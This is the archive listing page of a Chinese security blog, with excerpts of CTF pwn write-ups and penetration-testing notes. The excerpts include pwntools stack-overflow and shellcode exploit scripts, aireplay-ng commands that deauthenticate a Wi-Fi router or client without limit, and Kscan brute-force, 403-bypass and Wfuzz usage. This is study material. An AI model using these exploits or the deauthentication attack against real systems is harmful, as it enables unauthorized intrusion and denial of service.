avatar
文章
331
标签
30
分类
0

Home
Archives
Tags
Categories
List
  • Music
  • Movie
Link
About
The Blog of Monoceros406
搜索
Home
Archives
Tags
Categories
List
  • Music
  • Movie
Link
About

The Blog of Monoceros406

PWN入门-ret2pie做题
发表于2024-01-26|PWN
PWN入门-ret2pie做题[NISACTF 2022]ezpiePIE保护时基地址随机,先泄漏main地址,直接给了。计算偏移算shell函数地址。 123456789101112from pwn import *context(log_level='debug',os='linux',arch='i386')p=remote("node5.anna.nssctf.cn",28166)p.recvuntil("0x") #地址前缀0xmain_addr=int(p.recv(8),16) #8位地址以16进制形式读p.recvuntil("Input:")elf_base=main_addr-0x770 #计算偏移stack_overflow=b'a'*(0x28+4)shell_addr=p32(elf_base+0x80f) #求真实shell地址payload1=flat([stack_overflow,shell_addr])p.sen ...
PWN入门-ret2shellcode做题
发表于2024-01-26|PWN
PWN入门-ret2shellcode做题[HNCTF 2022 Week1]ret2shellcode123456789from pwn import *context(log_level='debug',os='linux',arch='amd64')p=remote("node5.anna.nssctf.cn",28261)elf=ELF('./attachment')shellcode=asm(shellcraft.sh()).ljust(0x108,b'a')buff_addr=p64(elf.sym["buff"])payload1=flat([shellcode,buff_addr])p.sendline(payload1)p.interactive() [GDOUCTF 2023]Shellcode123456789101112131415161718# 64位短shellcode 23字节:\x48\x31\xf6\x56\x4 ...
PWN入门-ret2text做题
发表于2024-01-26|PWN
PWN入门-ret2text做题[SWPUCTF 2021 新生赛]gift_pwn1checksec 文件名 开启堆栈不可执行保护(NX),不会把堆栈上数据当成指令来执行。 没有canary保护,可利用栈溢出来修改eip。 PIE地址随机花没有开启。 12345from pwn import *p=remote('node4.anna.nssctf.cn',28708)payload=b'a'*0x10+b'a'*8+p64(0x4005B6) #32位+4 64位+8p.sendline(payload)p.interactive() [CISCN 2019华北]PWN1123456from pwn import *context(log_level='debug',arch='amd64',os='linux')p=process('./attachment')payload=b'a'*0x2c+p64(0x ...
对无线路由发起DoS攻击
发表于2024-01-26|渗透测试
对无线路由发起DoS攻击先断开连接,查看附近所有WiFi: 1airodump-ng wlan0 记录目标MAC地址,尝试攻击,“-0 0”表示无限次数攻击: 1aireplay-ng -0 0 -a MAC地址 wlan0 很有可能本机与目标路由不在同一信道,尝试更改信道: 1iwconfig wlan0 channel 目标信道 以上流程适用于攻击该无线路由,以下方法为针对目标终端。 查看都有哪些终端连接到该无线路由: 1airodump-ng --bssid 无线路由MAC地址 wlan0 嗅探到目标终端的MAC地址后,再次确认是否在同一信道,尝试进行攻击: 1aireply-ng -0 0 -a 无线路由MAC地址 -c 目标终端MAC地址 wlan0
Kscan初探
发表于2024-01-26|渗透测试
Kscan初探端口扫描: 1kscan -t 192.168.217.1/24 存活网段探测: 1kscan --spy FOFA检索: 1kscan -f 'title="后台管理"' --fofa-size 15 暴力破解: 1kscan -t 127.0.0.1 --hydra CDN识别: 1kscan -t www.iywaobt.cn
Forbidden_buster初探
发表于2024-01-26|渗透测试
Forbidden_buster初探基本方法利用各种技术方法和Header测试绕过401、403访问控制限制。 1forbidden_buster -u http://example.com 常用参数 -u | –url 待测Web应用程序完整URL路径 -m | –method 测试方法 默认GET -H | –header 添加一个自定义Header -d | –data 向请求体中添加数据 支持JSON -p | –proxy 使用代理 –include-api API模糊测试 –include-unicode Unicode模糊测试 速度慢 –include-user-agent User-Agent模糊测试 速度慢 进阶方法1forbidden_buster --url "https://example.com/api/v1/secret" --method POST --header "Authorization: Bearer XXX" --data '{\"key\":\ ...
恶意代码分析实战
发表于2024-01-22|恶意代码
恶意代码分析实战静态分析查看可执行文件/DLL文件编译时间:PETool查看PE文件头,找到_IMAGE_NT_HEADERS.FileHeader.TimeDateStamp。 当导入表存在WS2_32.dll,则有联网行为。ADVAPI32.dll中存在创建服务和提权API。ole32.dll可创建COM实例。 通用脱壳机linxerUnpacker可脱FSG壳。 判断PE文件为EXE还是DLL:PETools文件头->特征值,看DLL复选框是否勾选。 恶意代码检测Vmware原理:in(0xED)指令与魔术字符串“VMXH”进行检测。另一种遍历HKLM\SYSTEM\CurrentControlSet\Control\Device以查找vmware值。也有其他各种老六行为。 CreateToolhelp32Snapshot进程、线程拍摄快照。 动态分析运行DLL: 1rundll32 *.dll,导出表函数名 用RegShot记录注册表操作。注册表创建服务路径:HKLM\SYSTEM\ControlSet001\Services\服务名,重要参数:ImagePa ...
靶机渗透实战基础-Vulnhub-NullByte
发表于2024-01-19|渗透测试
靶机渗透实战基础-Vulnhub-NullByte主机发现&端口扫描emm…没给IP,得自己扫: 1sudo arp-scan -l 或另一种方法: 1nmap -sn 192.168.2.0/24 再或另一种方法: 1sudo netdiscover -i wlan0 -r 192.168.2.0/24 发现NullByte主机IP为192.168.2.183。 分别探测该主机TCP和UDP端口服务: 12nmap --min-rate 10000 -sT -p- 192.168.2.183sudo nmap --min-rate 10000 -sU -p- 192.168.2.183 结果分别如下: 1234567891011PORT STATE SERVICE80/tcp open http111/tcp open rpcbind777/tcp open multiling-http58567/tcp open unknownPORT STATE SERVICE111/udp open rpcbind5353/udp ...
靶机渗透实战基础-Vulnhub-Prime_1
发表于2024-01-19|渗透测试
靶机渗透实战基础-Vulnhub-Prime:1主机发现&端口扫描攻击主机IP:192.168.2.130,C段扫描: 1nmap -sP 192.168.2.1/24 发现目标主机IP地址为:192.168.2.198。 进行进攻性扫描: 1nmap -A 192.168.2.198 发现两个端口开放: 12345678910PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: | 2048 8d:c5:20:23:ab:10:ca:de:e2:fb:e5:cd:4d:2d:4d:72 (RSA)| 256 94:9c:f8:6f:5c:f1:4c:11:95:7f:0a:2c:34:76:50:0b (ECDSA)|_ 256 4b:f6:f1:25:b6:13:26:d4:fc:9e:b0:72:9f:f4:69:68 (ED25519)80/tcp open ht ...
Wfuzz基础操作
发表于2024-01-19|渗透测试
Wfuzz基础操作爆后台文件: 1wfuzz -w wordlist URL/FUZZ.php 其中wordlist填字典目录,URL即为具体连接,关键字FUZZ为爆破点。 爆后台目录: 1wfuzz -w wordlist URL/FUZZ 爆URL参数: 1wfuzz -z range,000-99 url/xxx.php?id=FUZZ 其中range为id的取值范围。 指定cookie或session: 1wfuzz -z range,000-999 -b session=session -b cookie=cookie url/xxx.php?id=FUZZ 递归测试,在已找出的目录再递归一次: 1wfuzz -z list,"admin-login.php-test.php" -R 1 URL/FUZZ POST双传参: 1wfuzz -w /usr/share/wfuzz/wordlist/general/mima.txt -w /usr/share/wfuzz/wordlist/general/mima.txt -d "usern ...
1…212223…34
avatar
Monoceros406
Windows系统安全爱好者
文章
331
标签
30
分类
0
Follow Me
公告
哪里排版出锅了请告诉我QwQ QQ:1295625063
最新文章
Linux编程入门-系统选项2025-06-21
Linux编程入门-时间2025-06-15
Linux编程入门-用户管理与安全2025-06-15
Linux编程入门-内存管理2025-06-15
Linux编程入门-进程2025-06-14
标签
漏洞复现 恶意代码 密码学 Python 渗透测试 取证 编程语言 逆向工程 AWD Win系统调试 其他 GUI开发 解题报告 沙盒逃逸 算法 Win内核安全 OpenSSL 移动安全 UEFI 数学建模 Win驱动开发 WinAPI IoT PWN 前端开发 Web Linux Web3 后端开发 Misc
归档
  • 六月 20258
  • 五月 20259
  • 十二月 202413
  • 十一月 202412
  • 十月 202420
  • 九月 20243
  • 八月 20248
  • 七月 202413
网站资讯
文章数目 :
331
已运行时间 :
本站访客数 :
本站总访问量 :
最后更新时间 :
©2020 - 2025 By Monoceros406
框架 Hexo|主题 Butterfly